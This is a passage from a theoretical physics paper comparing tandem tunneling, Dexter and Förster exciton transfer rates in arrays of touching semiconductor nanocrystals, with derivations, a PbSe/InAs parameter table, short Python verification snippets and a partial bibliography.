The tandem tunneling matrix element was calculated in Eq. (\ref{eq:M_T}) in the second order of perturbation theory, where $t_e$ and $t_h$ are single particle transfer integrals calculated between one-electron wave functions.
Here we calculate the Dexter matrix element and show that at $\Delta \gg E_{c}$ it is much smaller than the tandem one. It is easier to consider this mechanism in the electron representation.
The Dexter exciton transfer happens due to potential exchange interaction between two electrons in NCs.
The initial state is $\Psi^{L*} (r_1) \Psi^{R}(r_{2})$, \textit{i.e.}, the first electron is in the conduction band of the left NC and the second electron is in the valence band of the right NC.
The final state is $\Psi^{R} (r_1) \Psi^{L} (r_2)$, \textit{i.e.}, the first electron is in the conduction band of the right NC and the second electron is in the valence band of the left NC (see Fig. \ref{fig:Scheme} a).
The matrix element has the following form:
\begin{equation}
\label{eq:M_D}
M_D = \int \Psi^{L*} (r_1) \Psi^{R*} (r_2) V(r_{1},r_{2}) \Psi^{R} (r_1) \Psi^{L} (r_2) d^3r_1 d^3 r_2.
\end{equation}
Here $V(r_{1},r_{2})$ is the interaction energy between electrons in points $r_{1}$ and $r_{2}$, which is of the order of $E_{c}$. In general, calculating the matrix element is a difficult problem. For our case, however, a significant simplification is available because the internal dielectric constant $\kappa_{NC}$ is typically much larger than the external dielectric constant $\kappa$ of the insulator in which the NC is embedded. The large internal dielectric constant $\kappa_{NC}$ implies that the NC charge is homogeneously redistributed over the NC surface. As a result a semiconductor NC can be approximately considered as a metallic one in terms of its Coulomb interactions, namely that when electrons are in two different NCs, the NCs are neutral and there is no interaction between them and $V=0$. When electrons are in the same NC, both NCs are charged and $V=E_{c}$. Thus, we can approximate Eq. (\ref{eq:M_D}) as:
\begin{equation}
\label{eq:M_D_2}
M_D = 2 E_{c} \left(\int \Psi^{L}(r) \Psi^{R}(r) d^{3}r\right)^{2}.
\end{equation}
The integral above is equal to $2 t_{e}/\Delta_{e}$ (see methods section) and we get:
\begin{equation}
\label{eq:7}
M_D = C_{D} E_{c}\left(\frac{\rho}{d}\right)^{6},
\end{equation}
where $C_{D} = 2^{9}/9\pi^{2} \simeq 5.7$ is the numerical coefficient.
Let us compare Eqs. (\ref{eq:7}) and (\ref{eq:our_Dexter}) for the matrix elements $M_D$ and $M_T$ of the Dexter and tandem processes.
We see that $M_D$ is proportional to $E_c$, while $M_T$ is inversely proportional to $E_c$.
(The origin of this difference is that, in Anderson's terminology \cite{Anderson_potential_kinetic_exchange}, the former describes ``potential exchange'', while the latter describes ``kinetic exchange''.
In the theory of magnetism \cite{Anderson_potential_kinetic_exchange} the former leads to ferromagnetism and the latter to antiferromagnetism.)
Note that the ratio (\ref{eq:the_answer}) is inversely proportional to the fourth power of the effective mass.
As a result, in semiconductors with small effective mass, such as InP and CdSe, the ratio of the tandem and Dexter rates is very large (up to $100$).
Using $\kappa=2\kappa_{NC}\rho/d$ from Ref. \cite{dielectric_constant_touching_NC}, we calculate this ratio for different NCs in Table 1.
We see that typically the tandem tunneling rate is larger than or comparable to the Dexter one.
So far we have dealt only with NCs in which the quantization energy $\Delta$ is smaller than half of the semiconductor energy gap, so that one can use parabolic electron and hole spectra. This condition is violated in semiconductor NCs with very small effective masses $\sim 0.1 ~m$ and small energy gaps $\sim 0.2 \div 0.3$ eV, such as InAs and PbSe. In these cases, the quantization energy $\Delta$ should be calculated using the non-parabolic (``relativistic'') linear part of the electron and hole spectra $|\epsilon| = \hbar v k$, where $v \simeq 10^{8} ~\mathrm{cm/s}$~\cite{Wise_PbSe,PbS_spectrum,PbSe_NC_spectrum_Delerue}. This gives $\Delta = 2 \pi \hbar v/d$. We show in the methods section that substitution of $\Delta_{e,h}$ in Eq. (\ref{eq:t_2}) by $\Delta/2$ leads to the correct ``relativistic'' modification of the single particle tunneling matrix element $t$ between two such NCs. Then for InAs and PbSe NCs with the same geometrical parameters as in Table 1 we arrive at ratios $\tau^{-1}_{T}/\tau^{-1}_{D}$ as large as $1000$ (see Table 2). One can see, however, that the inequalities (\ref{eq:condition}) are only marginally valid, so that this case deserves further attention.
\begin{table}[h]
\label{tab:parameters}
\begin{tabular}{ c | c| c| c| c| c |c| c |c }
\hline
NC & $\kappa_{NC}$ & $a_{0}$ ($\mathrm{\AA}$) & $\Delta$ (meV) & $\alpha \Delta$ (meV) & $E_{c}$ (meV) & $t_{e}$ (meV) & $\tau_{T}^{-1}/\tau_{F}^{-1}$ & $\tau_{T}^{-1}/\tau_{D}^{-1}$ \\ \hline
PbSe & 23 &25.8 &660 &33&25&2&0.1& $10^{3}$ \\
InAs & 12.3 &19.7 &660 &33&46&2&$10^{-2}$& $10^{2}$ \\
\hline
\end{tabular}
\caption{Parameters and results for ``relativistic'' NCs PbSe and InAs. As in Table 1, we use $d=6 ~\mathrm{nm}$, $\rho=0.2 d \simeq 1 ~\mathrm{nm}$ and $\alpha=0.05$.}
\end{table}
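The last column of Table 2 can be reproduced directly from Eq. (\ref{eq:the_answer}) with the ``relativistic'' substitution $\Delta_{e,h} \rightarrow \Delta/2$; a quick order-of-magnitude check:

```python
import math

def tandem_over_dexter(delta_e, delta_h, Ec):
    # Eq. (the_answer): (Delta_e Delta_h / 4 Ec^2)^2; all energies in meV
    return (delta_e * delta_h / (4.0 * Ec**2)) ** 2

# Delta = 660 meV for d = 6 nm, so Delta_e = Delta_h = Delta/2 = 330 meV.
pbse = tandem_over_dexter(330.0, 330.0, Ec=25.0)
inas = tandem_over_dexter(330.0, 330.0, Ec=46.0)
assert round(math.log10(pbse)) == 3   # ~10^3 for PbSe, as in Table 2
assert round(math.log10(inas)) == 2   # ~10^2 for InAs
```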
\section{Conclusion}
In this paper, we considered exciton transfer in an array of NCs epitaxially connected through facets with a small radius $\rho$.
After evaluating the matrix elements for the F{\"o}rster and Dexter rates in such arrays, we proposed an alternative mechanism in which the electron and hole of the exciton tunnel in tandem through the contact facet. The tandem tunneling happens in the second order of perturbation theory, through an intermediate state in which the electron and the hole are in different NCs.
For all semiconductor NCs we studied except ZnO the tandem tunneling rate is much larger than the Dexter one.
The tandem tunneling rate is comparable with the F{\"o}rster one for bright excitons and dominates for dark excitons.
Therefore it determines exciton transfer at low temperatures.
For silicon NCs the tandem tunneling rate substantially exceeds the F{\"o}rster rate.
\section{Methods}
\subsection{Calculation of $M_{T}$}
\label{sec:Appendix_wave_function_t}
If two NCs are separated, their 1S ground states are degenerate. When they touch each other by a small facet with radius $\rho \ll d$, the degeneracy is lifted and the 1S state is split into two levels $U_{s}$ and $U_{a}$ corresponding to the electron wave functions:
\begin{equation}
\label{eq:psi_g_u}
\psi_{s,a}=\frac{1}{\sqrt{2}} [ \Psi^{L}(-z) \pm \Psi^{L}(z)],
\end{equation}
which are symmetric and antisymmetric about the plane $z=0$, respectively. The difference between the two energies is $U_{a}-U_{s}=2 t$, where $t$ is the overlap integral between the NCs. Similarly to problem 3 in $\S$50 of Ref. \cite{landau_quantum}, we get Eq. (\ref{eq:t}).
Below we find $\Psi^{L}$ in the way outlined in Refs. \cite{Rayleigh_diffraction_aperure,localization_length_NC}. We look for a solution of the form
\begin{equation}
\label{eq:psi_definition}
\Psi^{L}=\psi_{0}+\psi,
\end{equation}
where $\psi_{0}$ is non-zero only inside the NC and $\psi$ is a correction which is substantial only near the contact facet with radius $\rho \ll d$, so that $\nabla^{2} \psi \gg \psi \Delta_{e,h}$ and we can omit the energy term in the Schr\"{o}dinger equation:
\begin{equation}
\label{eq:Laplacian}
\nabla^{2} \psi=0.
\end{equation}
Near the contact facet with $\rho \ll d$, the two touching spheres can be seen as an impenetrable plane screen, with the contact facet as an aperture in this screen. The boundary conditions for $\psi$ are the following: $\psi=0$ on the screen, while in the aperture the derivative $d\Psi^{L}/dz$ is continuous:
\begin{equation}
\label{eq:psi_derivative}
\left . \frac{\partial \psi}{\partial z} \right|_{z=+0} = \left . \frac{\partial \psi_{0}}{\partial z} + \frac{\partial \psi}{\partial z} \right|_{z=-0}.
\end{equation}
As shown in Refs. \cite{Rayleigh_diffraction_aperure, localization_length_NC} $\psi$ is symmetric with respect to the plane $z=0$. As a result,
\begin{equation}
\label{eq:psi_z}
\left. \frac{\partial \psi}{\partial z} \right|_{z=+0} = -2\frac{\sqrt{\pi}}{d^{5/2}} =A.
\end{equation}
It is easy to solve the Laplace equation with this boundary condition in oblate spheroidal coordinates $\varphi$, $\xi$, $\mu$, which are related to the cylindrical coordinates $z$, $\rho'$, $\varphi$ (see Fig.~\ref{fig:oblate}) as
\begin{figure}[ht]
\includegraphics[width=0.45\textwidth]{figure2.pdf}
\caption{\label{fig:oblate} The contact with radius $\rho$ between two spheres with diameter $d \gg \rho$ can be represented by a screen with an aperture. In oblate spheroidal coordinates the aperture corresponds to the plane $\xi=0$ and the screen to the plane $\mu=0$.}
\end{figure}
\begin{eqnarray}
\rho' & = &\rho \sqrt{(1+\xi^{2})(1-\mu^{2})}, \nonumber \\
z & = &\rho \xi \mu, \label{eq:relation} \\
\varphi & =& \varphi. \nonumber
\end{eqnarray}
The Laplace equation can then be rewritten as \cite{9780387184302}:
\begin{equation}
\label{eq:Laplace}
\frac{\partial}{\partial \xi} (1+\xi^{2}) \frac{\partial \psi}{\partial \xi} + \frac{\partial}{\partial \mu} (1-\mu^{2}) \frac{\partial \psi}{\partial \mu}=0.
\end{equation}
The boundary conditions in these coordinates are $\psi=0$ for $\mu=0$ ($z=0$ and $\rho'>\rho$), while in the region $\xi=0$ ($z=0$, $\rho'<\rho$)
$$
\left. \frac{\partial \psi}{\partial \xi}\right|_{\xi=0} \frac{1}{\rho \mu} = A.
$$
One can check by direct substitution that the solution at $z>0$ satisfying these boundary conditions is:
\begin{equation}
\label{eq:solution}
\psi= \frac{2\rho A}{\pi} \mu (1-\xi \arccot \xi).
\end{equation}
Thus at the contact between the two spheres, where $\xi=0$ ($z=0$, $\rho'<\rho$):
\begin{equation}
\label{eq:surface_psi}
\psi= \frac{4}{\sqrt{\pi}} \frac{1}{d^{3/2}} \frac{\rho}{d} \sqrt{1-\frac{\rho'^{2}}{\rho^{2}}}.
\end{equation}
Now we can calculate the integral (\ref{eq:t}) using the expression (\ref{eq:surface_psi}) for $\psi$ at the contact between the two NCs, and arrive at Eq. (\ref{eq:t_2}).
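The solution (\ref{eq:solution}) can also be verified symbolically. The sketch below (using sympy; the constant prefactor $2\rho A/\pi$ is dropped since it cancels in the homogeneous equation) substitutes $\psi \propto \mu(1-\xi \arccot \xi)$ into the oblate-spheroidal Laplace equation (\ref{eq:Laplace}):

```python
import sympy as sp

xi, mu = sp.symbols('xi mu', positive=True)

# Trial solution from Eq. (solution), without the constant prefactor
psi = mu * (1 - xi * sp.acot(xi))

# Left-hand side of the Laplace equation in oblate spheroidal coordinates
laplace = (sp.diff((1 + xi**2) * sp.diff(psi, xi), xi)
           + sp.diff((1 - mu**2) * sp.diff(psi, mu), mu))

print(sp.simplify(laplace))  # 0, so psi indeed solves the equation
```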
\subsection{The energy of the intermediate state}
Here we study a cubic lattice of touching NCs with period $d$.
For large $\kappa_{NC}$ it can be considered as a lattice of identical capacitors with capacitance $C_{0}$ connecting nearest-neighbor sites.
One immediately gets that the macroscopic dielectric constant of the NC array is $\kappa=4\pi C_{0}/d$.
We calculate the energy of the intermediate state, in which an electron and a hole occupy nearest-neighbor NCs, taking the energy of all neutral NCs as the reference point.
The Coulomb energy necessary to add one electron (or hole) to a neutral NC is called the charging energy $E_{e}$.
It was shown \cite{dielectric_constant_touching_NC} that for touching NCs arranged in a cubic lattice this energy is:
\begin{equation}
\label{eq:chargin_energy}
E_{e}=1.59 E_{c}.
\end{equation}
We show here that the interaction energy between two nearest-neighbor NCs is $E_{I}=-(2\pi/3) E_{c}$, so that the energy of the intermediate state is $2E_{e}+E_{I} =\xi E_{c}$, where $\xi \simeq 1.08$.
Let us first recall the derivation of the result (\ref{eq:chargin_energy}).
By definition, the charging energy is
\begin{equation}
\label{eq:charging_energy_capacitance}
E_{e} = \frac{e^{2}}{2C},
\end{equation}
where $C$ is the capacitance of a NC immersed in the array.
It is known that the capacitance between a site of a cubic lattice of identical capacitors $C_{0}$ and infinity is $C=C_{0}/\beta$, with $\beta \simeq 0.253$~\cite{PhysRevB.70.115317,Lattice_green_function}.
We see that $1/\beta$ plays the role of the effective number of parallel capacitors connecting this site to infinity. Thus we arrive at
\begin{equation}
\label{eq:charging_energy_capacitance_2}
E_{e} = \frac{e^{2}}{2C} =2\pi \beta E_{c} \simeq 1.59 E_{c}
\end{equation}
We also need the interaction energy between two oppositely charged nearest-neighbor sites of the cubic lattice:
\begin{equation}
E_{I} = -\frac{e^{2}}{2 C_{12}},
\end{equation}
where $C_{12}$ is the total capacitance between the two nearest-neighbor NCs. It is easy to see that $C_{12}=3C_{0}$, so that
\begin{equation}
\label{eq:ineraction_energy}
E_{I} = -\frac{e^{2}}{2 C_{12}} = -\frac{2\pi}{3}E_{c}.
\end{equation}
Thus we arrive at the energy of the intermediate state for the cubic lattice, $2E_{e}+E_{I} \simeq 1.08 E_{c}$, \textit{i.e.}, $\xi=1.08$ for this case.
We repeated this derivation for other lattices and arrived at $\xi=0.96$ and $\xi=0.94$ for bcc and fcc lattices of capacitors, respectively.
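The bookkeeping for the cubic lattice can be condensed into a few lines (a minimal sketch; the only input is the lattice Green-function constant $\beta \simeq 0.253$):

```python
import math

beta = 0.253               # cubic-lattice Green-function constant
E_e = 2 * math.pi * beta   # charging energy in units of E_c
E_I = -2 * math.pi / 3     # nearest-neighbor attraction, since C12 = 3*C0

xi = 2 * E_e + E_I         # intermediate-state energy in units of E_c
print(round(E_e, 2), round(xi, 2))  # 1.59 1.08
```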
\subsection{Calculation of $M_{D}$}
\label{sec:Dexter}
One can calculate the integral (\ref{eq:M_D_2}) in the following way. In the left NC, $\Psi^{R}$ can be written as $\psi$. We start from Green's second identity for the functions $\Psi^{L}$ and $\psi$:
\begin{equation}
\label{eq:Green_identity}
\int d^{3}r\, (\psi \nabla^{2} \Psi^{L} - \Psi^{L} \nabla^{2} \psi ) = \oint d\mathbf{S} \cdot (\psi \nabla \Psi^{L} - \Psi^{L} \nabla \psi).
\end{equation}
Because $\psi$ satisfies Eq. (\ref{eq:Laplacian}) and $\Psi^{L}$ is zero on the surface of the NC except at the contact facet, where it is equal to $\psi$, we get:
$$ \int \psi(r) \Psi^{L}(r) d^{3}r = \frac{2t}{\Delta} $$
\subsection{Non-parabolic band approximation}
Below we use the non-parabolic ``relativistic'' Kane approach~\cite{PbS_spectrum}. Namely, we assume that the ground-state wave function $\psi_{0}$ of an electron or hole in an isolated spherical NC satisfies the Klein--Gordon equation:
\begin{equation}
\label{eq:KG}
-\hbar^{2}v^{2} \nabla^{2} \psi_{0}+m^{*2}v^{4}\psi_{0}=E^{2}\psi_{0}.
\end{equation}
This approximation works well for the ground state of an electron and a hole~\cite{PbS_spectrum}. The energy spectrum is:
\begin{equation}
\label{eq:spectrum}
E(k)=\pm\sqrt{m^{*2}v^{4}+\hbar^{2}v^{2}k^{2}}.
\end{equation}
One can immediately see that the bulk band gap is $E_{g}=2m^{*}v^{2}$. The solution of Eq. (\ref{eq:KG}) for a spherical isolated NC is the same as in the parabolic band approximation (see Eq. (\ref{eq:psi_0})). The kinetic energy $\Delta$ becomes:
\begin{equation}
\label{eq:Delta_relativistic}
\Delta=\sqrt{m^{*2}v^{4}+\hbar^{2}v^{2}\left(\frac{2\pi}{d}\right)^{2}}-m^{*}v^{2}.
\end{equation}
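A minimal numeric check of the two limits of Eq. (\ref{eq:Delta_relativistic}) (a sketch in arbitrary units, with $m^{*}v^{2}$ and $\hbar v k$, $k = 2\pi/d$, as the two inputs):

```python
import math

def delta(m_star_v2, hbar_v_k):
    """Kinetic energy of the ground state, Eq. (Delta_relativistic)."""
    return math.sqrt(m_star_v2**2 + hbar_v_k**2) - m_star_v2

# Ultra-relativistic limit m* = 0: Delta -> hbar*v*(2*pi/d)
print(delta(0.0, 1.0))  # 1.0

# Parabolic limit m*v^2 >> hbar*v*k: Delta -> (hbar*k)^2 / (2 m*)
m, k = 100.0, 1.0
print(delta(m, k), k**2 / (2 * m))  # nearly equal
```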
Let us now concentrate on the expression for $t$. As in the parabolic case, when two NCs touch each other through a small facet with radius $\rho \ll d$, the 1S degeneracy is lifted and the state splits into two levels $U_{s}$ and $U_{a}$, corresponding to the symmetric and antisymmetric wave functions $\psi_{s,a}$ of Eq. (\ref{eq:psi_g_u}). Similarly to problem 3 in $\S$50 of Ref. \cite{landau_quantum}, we use that $\psi_{s}$ satisfies Eq. (\ref{eq:KG}) with the energy $U_{s}$, while $\Psi^{L}$ satisfies the same equation with the energy $E_{L}$. As a result we get the difference:
\begin{equation}
\label{eq:difference}
E^{2}_{L}-U^{2}_{s} = \hbar^{2} v^{2} \int \left(\Psi^{L}\nabla^{2} \psi_{s} - \psi_{s} \nabla^{2} \Psi^{L} \right) dV \left( \int \psi_{s} \Psi^{L} dV \right)^{-1}.
\end{equation}
Repeating the same steps for $\psi_{a}$, we arrive at:
\begin{equation}
\label{eq:t_resistivity}
t=(U_{a}^{2}-U_{s}^{2}) /4U_{s} =\frac{\hbar^{2}v^{2}}{U_{s}} \int \Psi^{L} \frac{\partial \Psi^{L}}{\partial z} dS.
\end{equation}
One can check that at $m^{*}v^{2} \gg \hbar v k$ this expression reduces to (\ref{eq:t}).
For $m^{*}=0$ we get:
\begin{equation}
\label{eq:t_r}
t = \frac{\hbar v d}{2\pi} \int \Psi^{L} \frac{\partial \Psi^{L}}{\partial z} dS.
\end{equation}
Using the same approach to calculate the integral as in Sec. \ref{sec:Appendix_wave_function_t}, we get:
\begin{equation}
\label{eq:t_R}
t=\frac{4}{3\pi} \Delta \left(\frac{\rho}{d}\right)^{3}
\end{equation}
In this case, Eq. (\ref{eq:the_answer_foster}) for the ratio of the tandem and F{\"o}rster rates can be written as:
\begin{equation}
\label{eq:Tandem_forster}
\frac{\tau_{T}^{-1}}{\tau_{F}^{-1}}=3.7 \left(\frac{\hbar v}{e^{2}}\right)^{4} \left(\frac{d}{a_{0}}\right)^{4} (\kappa+2\kappa_{NC})^{4} \left(\frac{\rho}{d}\right)^{12}.
\end{equation}
The ratio of the tandem and Dexter rates is:
\begin{equation}
\label{eq:Tandem_dexter}
\frac{\tau_{T}^{-1}}{\tau_{D}^{-1}}=\frac{\pi^{4}}{2^{4}} \left(\frac{\hbar v}{e^{2}}\right)^{4} \kappa_{NC}^{4}.
\end{equation}
Eqs. (\ref{eq:Tandem_forster}) and (\ref{eq:Tandem_dexter}) are used to calculate the ratios in Table 2.
\section{Acknowledgement}
We are grateful to A. V. Chubukov, P. Crowell, Al. L. Efros, H. Fu, R. Holmes, A. Kamenev, U. R. Kortshagen, A. V. Rodina, I. Rousochatzakis, M. Sammon, B. Skinner, M.V. Voloshin, D. R. Yakovlev and I. N. Yassievich for helpful discussions. This work was supported primarily by the National Science Foundation through the University of Minnesota MRSEC under Award No. DMR-1420013.
\providecommand{\latin}[1]{#1}
\providecommand*\mcitethebibliography{\thebibliography}
\csname @ifundefined\endcsname{endmcitethebibliography}
{\let\endmcitethebibliography\endthebibliography}{}
\begin{mcitethebibliography}{64}
\providecommand*\natexlab[1]{#1}
\providecommand*\mciteSetBstSublistMode[1]{}
\providecommand*\mciteSetBstMaxWidthForm[2]{}
\providecommand*\mciteBstWouldAddEndPuncttrue
{\def\unskip.}{\unskip.}}
\providecommand*\mciteBstWouldAddEndPunctfalse
{\let\unskip.}\relax}
\providecommand*\mciteSetBstMidEndSepPunct[3]{}
\providecommand*\mciteSetBstSublistLabelBeginEnd[3]{}
\providecommand*\unskip.}{}
\mciteSetBstSublistMode{f}
\mciteSetBstMaxWidthForm{subitem}{(\alph{mcitesubitemcount})}
\mciteSetBstSublistLabelBeginEnd
{\mcitemaxwidthsubitemform\space}
{\relax}
{\relax}
\bibitem[Shirasaki \latin{et~al.}(2012)Shirasaki, Supran, Bawendi, and
Bulovic]{ki_Supran_Bawendi_Bulovic_2012}
Shirasaki,~Y.; Supran,~G.~J.; Bawendi,~M.~G.; Bulovic,~V. Emergence of
Colloidal Quantum-Dot Light-Emitting Technologies. \emph{Nat. Photonics}
\textbf{2012}, \emph{7}, 13--23\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2009)Liu, Holman, and
Kortshagen]{Kortshagen_Si_solar_cell}
Liu,~C.-Y.; Holman,~Z.~C.; Kortshagen,~U.~R. Hybrid Solar Cells from {P3HT} and
Silicon Nanocrystals. \emph{Nano Lett.} \textbf{2009}, \emph{9},
449--452\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Gur \latin{et~al.}(2005)Gur, Fromer, Geier, and
Alivisatos]{gur_air-stable_2005}
Gur,~I.; Fromer,~N.~A.; Geier,~M.~L.; Alivisatos,~A.~P. Air-Stable
All-Inorganic Nanocrystal Solar Cells Processed from Solution. \emph{Science}
\textbf{2005}, \emph{310}, 462--465\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Yang \latin{et~al.}(2015)Yang, Zheng, Cao, Titov, Hyvonen, Manders,
Xue, Holloway, and Qian]{LED_Yang_2015}
Yang,~Y.; Zheng,~Y.; Cao,~W.; Titov,~A.; Hyvonen,~J.; Manders,~J.~R.; Xue,~J.;
Holloway,~P.~H.; Qian,~L. High-Efficiency Light-Emitting Devices Based on
Quantum Dots with Tailored Nanostructures. \emph{Nat. Photonics}
\textbf{2015}, \emph{9}, 259-266\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Gong \latin{et~al.}(2016)Gong, Yang, Walters, Comin, Ning, Beauregard,
Adinolfi, Voznyy, and Sargent]{Near_infrared_LED_2016}
Gong,~X.; Yang,~Z.; Walters,~G.; Comin,~R.; Ning,~Z.; Beauregard,~E.;
Adinolfi,~V.; Voznyy,~O.; Sargent,~E.~H. Highly Efficient Quantum Dot
Near-Infrared Light-Emitting Diodes. \emph{Nat. Photonics} \textbf{2016},
\emph{10}, 253--257\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Bae \latin{et~al.}(2013)Bae, Park, Lim, Lee, Padilha, McDaniel, Robel,
Lee, Pietryga, and Klimov]{Robel_Lee_Pietryga_Klimov_2013}
Bae,~W.~K.; Park,~Y.-S.; Lim,~J.; Lee,~D.; Padilha,~L.~A.; McDaniel,~H.;
Robel,~I.; Lee,~C.; Pietryga,~J.~M.; Klimov,~V.~I. Controlling the Influence
of Auger Recombination on the Performance of Quantum-Dot Light-Emitting
Diodes. \emph{Nat. Commun.} \textbf{2013}, \emph{4}, 2661\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Straus \latin{et~al.}(2015)Straus, Goodwin, Gaulding, Muramoto,
Murray, and Kagan]{Kagan_surface_trap_passivation}
Straus,~D.~B.; Goodwin,~E.~D.; Gaulding,~E.~A.; Muramoto,~S.; Murray,~C.~B.;
Kagan,~C.~R. Increased Carrier Mobility and Lifetime in {CdSe} Quantum Dot
Thin Films through Surface Trap Passivation and Doping. \emph{J. Phys. Chem. Lett.}
\textbf{2015}, \emph{6}, 4605--4609\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Choi \latin{et~al.}(2012)Choi, Fafarman, Oh, Ko, Kim, Diroll,
Muramoto, Gillen, Murray, and Kagan]{Murray_Bandlike}
Choi,~J.-H.; Fafarman,~A.~T.; Oh,~S.~J.; Ko,~D.-K.; Kim,~D.~K.; Diroll,~B.~T.;
Muramoto,~S.; Gillen,~J.~G.; Murray,~C.~B.; Kagan,~C.~R. Bandlike Transport
in Strongly Coupled and Doped Quantum Dot Solids: A Route to High-Performance
Thin-Film Electronics. \emph{Nano Lett.} \textbf{2012}, \emph{12},
2631--2638\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Reich \latin{et~al.}(2014)Reich, Chen, and
Shklovskii]{Reich_Shklovskii}
Reich,~K.~V.; Chen,~T.; Shklovskii,~B.~I. Theory of a Field-Effect Transistor
Based on a Semiconductor Nanocrystal Array. \emph{Phys. Rev. B}
\textbf{2014}, \emph{89}, 235303\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2013)Liu, Tolentino, Gibbs, Ihly, Perkins, Liu,
Crawford, Hemminger, and Law]{iu_Crawford_Hemminger_Law_2013}
Liu,~Y.; Tolentino,~J.; Gibbs,~M.; Ihly,~R.; Perkins,~C.~L.; Liu,~Y.;
Crawford,~N.; Hemminger,~J.~C.; Law,~M. {PbSe} Quantum Dot Field-Effect
Transistors with Air-Stable Electron Mobilities above
$7~\mathrm{cm^2V^{-1}s^{-1}}$. \emph{Nano Lett.} \textbf{2013}, \emph{13},
1578--1587\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Choi \latin{et~al.}(2016)Choi, Wang, Oh, Paik, Sung, Sung, Ye, Zhao,
Diroll, Murray, and Kagan]{Kagan_FET_2016}
Choi,~J.-H.; Wang,~H.; Oh,~S.~J.; Paik,~T.; Sung,~P.; Sung,~J.; Ye,~X.;
Zhao,~T.; Diroll,~B.~T.; Murray,~C.~B.; Kagan,~C.~R. Exploiting the
Colloidal Nanocrystal Library to Construct Electronic Devices. \emph{Science}
\textbf{2016}, \emph{352}, 205--208\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Keuleyan \latin{et~al.}(2011)Keuleyan, Lhuillier, Brajuskovic, and
Guyot-Sionnest]{Philippe_HgTe}
Keuleyan,~S.; Lhuillier,~E.; Brajuskovic,~V.; Guyot-Sionnest,~P. Mid-Infrared
{HgTe} Colloidal Quantum Dot Photodetectors. \emph{Nat. Photonics}
\textbf{2011}, \emph{5}, 489--493\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Jeong and Guyot-Sionnest(2016)Jeong, and
Guyot-Sionnest]{Philippe_mid_infrared_2016}
Jeong,~K.~S.; Guyot-Sionnest,~P. Mid-Infrared Photoluminescence of CdS and
{CdSe} Colloidal Quantum Dots. \emph{ACS Nano} \textbf{2016}, \emph{10},
2225--2231\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Talapin \latin{et~al.}(2010)Talapin, Lee, Kovalenko, and
Shevchenko]{Lee_Kovalenko_Shevchenko_2010}
Talapin,~D.~V.; Lee,~J.-S.; Kovalenko,~M.~V.; Shevchenko,~E.~V. Prospects of
Colloidal Nanocrystals for Electronic and Optoelectronic Applications.
\emph{Chem. Rev. (Washington, DC, U. S.)} \textbf{2010}, \emph{110}, 389--458\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kagan and Murray(2015)Kagan, and Murray]{Kagan_QD_review}
Kagan,~C.~R.; Murray,~C.~B. Charge Transport in Strongly Coupled Quantum Dot
Solids. \emph{Nat. Nanotechnol.} \textbf{2015}, \emph{10}, 1013--1026\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2013)Liu, Lee, and
Talapin]{Talapin_2013_high_mobility}
Liu,~W.; Lee,~J.-S.; Talapin,~D.~V. {III-V} Nanocrystals Capped with Molecular
Metal Chalcogenide Ligands: High Electron Mobility and Ambipolar
Photoresponse. \emph{J. Am. Chem. Soc.} \textbf{2013},
\emph{135}, 1349--1357\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Lanigan and Thimsen(2016)Lanigan, and Thimsen]{Thimsen_ZnO_MIT}
Lanigan,~D.; Thimsen,~E. Contact Radius and the Insulator--Metal Transition in
Films Comprised of Touching Semiconductor Nanocrystals. \emph{ACS Nano}
\textbf{2016}, \emph{10}, 6744--6752\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
